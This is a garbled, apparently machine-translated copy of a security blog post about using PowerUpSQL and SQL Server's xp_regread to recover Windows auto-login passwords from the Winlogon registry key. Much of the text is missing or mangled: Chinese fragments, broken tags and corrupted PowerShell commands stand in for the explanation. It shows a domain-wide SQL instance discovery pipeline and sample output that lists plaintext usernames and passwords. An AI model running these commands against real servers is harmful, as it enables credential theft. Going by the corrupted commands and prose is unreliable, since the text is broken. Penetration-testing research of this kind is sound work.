https://blog.netspi.com/get-windows-auto-login-passwords-via-sql-server-powerupsql/
<强>,强>
PowerUpSQLSQL ServerdWindowsxp_regread
<强> xp_regread 强> <强> 强>
SQL Server2000xp_regreadSQL ServerSQL ServerLocalSystemSQL Server 2000 SP4xp_regreadSQLServerhttps://support.microsoft.com/en-us/kb/887165
<强> xp_regread 强> <强> 强>
xp_regreadPowerUpSQLGet-SQLServerInfo
SQL ServerSP4SQL Serverxp_regreadxp_cmdshellxp_cmdshelxp_regreadSQL服务器
<强> xp_regread 强> <强> Windows 强> <强> 强>
WindowsPOSSQLWindows
微软HKEY_LOCAL_MACHINE软件\ \ WindowsNT \ CURRENTVERSION \登录
TSQLxp_regreadxp_cmdshellTSQL
Get-SQLRecoverPwAutoLogonPowerUpSQLWindowsWindows
,
SQL Serverhttps://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/
p C: \祝辞$访问=Get-SQLInstanceDomain - verbose | Get-SQLConnectionTestThreaded -Verbose-Threads 15 |都{$ _。状态eq“访问”}
p C: \祝辞可以美元| Get-SQLRecoverPwAutoLogon - VERBOSE
详细:SQLServer1.demo.local \ Instance1:连接成功。
详细:SQLServer2.demo.local \用途:连接成功。
详细:SQLServer2.demo.local \程序:这个函数需要系统管理员特权。完成了。
详细:SQLServer3.demo.local \ 2014:连接成功。
详细:SQLServer3.demo.local \ 2014:其功能需要系统管理员特权。完成了。
ComputerName: SQLServer1
Instance ,,,: SQLServer1 \ Instance1
Domain ,,,,,: demo.local
UserName ,,,: KioskAdmin
Password ,,,:测试
ComputerName: SQLServer1
Instance ,,,: SQLServer1 \ Instance1
Domain ,,,,,: demo.local
UserName ,,,: kioskuser
Password ,,,: KioskUserPassword !
<强> 强>
xp_regreadsqlserverinfosqlrecoverpwautologon
https://support.microsoft.com/en-us/kb/887165
https://msdn.microsoft.com/en-us/library/aa940179 (v=winembedded.5) . aspx http://sqlmag.com/t-sql/using-t-sql-manipulate-registry